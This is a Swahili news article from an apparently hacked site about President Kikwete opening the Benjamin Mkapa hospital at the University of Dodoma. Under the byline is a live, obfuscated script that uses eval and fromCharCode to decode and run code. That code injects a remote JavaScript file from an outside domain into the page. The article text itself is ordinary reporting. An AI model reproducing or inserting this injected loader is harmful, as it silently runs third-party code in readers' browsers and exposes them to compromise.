Recent Comments

Hospitali ya kisasa yazinduliwa Dodoma

By Baraka Bitariho Oct 15, 2015
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

RAIS Jakaya Kikwete amezindua hospitali ya kisasa ya Benjamin Mkapa mjini hapa, ambayo pamoja na kuhudumia magonjwa yote, itakuwa maalumu kwa ajili ya matatizo yanayohusu figo, hususani kusafisha damu hadi kubadili figo.

Aidha, hospitali hiyo ambayo imejengwa katika Chuo Kikuu cha Dodoma (UDOM), kilometa chache kutoka katikati ya mji wa Dodoma, itakuwa na kifaa cha kisasa cha tiba ya ugonjwa wa saratani.

Uzinduzi huo ulifanyika juzi jioni katika hafla iliyohudhuriwa na wakazi jirani na Udom na viongozi mbalimbali, akiwamo Mkuu wa Chuo Kikuu cha Dodoma na Rais mstaafu Benjamin Mkapa, ambaye hospitali hiyo imepewa jina lake.

Kikwete alisema amefurahishwa na hatua hiyo ambayo ni uzinduzi wa awamu ya kwanza ya hospitali hiyo na kuipongeza Udom, Wizara ya Afya na Ustawi wa Jamii na Mfuko wa Taifa wa Bima ya Afya (NHIF), unaotoa fedha za ujenzi huo.

“Nimefurahishwa na hatua hii iliyofikiwa. Hospitali hii itakuwa kubwa na ya kisasa. Itachukua vitanda 300, wakati ile inayojengwa Mlonganzila (Dar es Salaam), itachukua vitanda 600, kwa hiyo hii ni kubwa pia. “Hivyo, naushuruku uongozi wa Udom, Wizara ya Afya na Mfuko wa Taifa wa Bima ya Afya kwa kusimamia mradi huu vizuri. Hii itakuwa hospitali ya daraja la juu,” alisema Kikwete aliyezindua ujenzi huo Novemba 2010.

Alitoa shukrani maalumu kwa aliyekuwa Mkurugenzi Mkuu wa NHIF, Emmanuel Humba aliyetoa wazo la kujengwa kituo cha maradhi hapa Dodoma mwaka 2008, na Rais Kikwete aliyeagiza kijengwe ndani ya Udom.

Akitoa maelezo kwa Rais Kikwete, Naibu Makamu Mkuu wa Chuo anayeshughulikia Mipango, Fedha na Utawala, Profesa Shaaban Mlacha, alisema hospitali hiyo itakuwa na majengo mawili, la uchunguzi na la matibabu lenye vitanda 300.

Profesa Mlacha alisema awamu ya kwanza imekamilika, ikiwamo ununuzi wa samani na sasa wanasubiri vifaa tiba; na awamu ya pili itakamilika muda mfupi ujao, na kwamba gharama ya ujenzi ni Sh bilioni 170.

Alisema tangu Oktoba 9 mwaka huu, hospitali ilianza kutoa huduma kwa wagonjwa zaidi ya 200 wakati ikisubiriwa Wizara ya Afya na Ustawi wa Jamii ijiweke sawa kuendesha hospitali hiyo.

Profesa Mlacha alisema: “Malengo ni kuwa hospitali ya kisasa na bora kuliko zote Afrika Mashariki na ya Kati kama ilivyo Chuo Kikuu cha Dodoma. Ishara mojawapo ya mafanikio ya mwelekeo huo ni kifaa cha kisasa cha tiba ya ugonjwa wa saratani ambacho kimetengewa fedha.”

Alisema kibali cha kutumia fedha za bima kilitolewa, na chombo hicho kitanunuliwa na Tanzania, itakuwa ni nchi ya tatu Afrika baada ya Afrika Kusini na Morocco. Alisema kuwapo kwa hospitali maalumu kwa ajili ya matatizo ya figo, tafsiri yake ni kwamba upelekaji wa wagonjwa nje ya Tanzania kwa matibabu utafikia kikomo.

OP Habari Leo

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com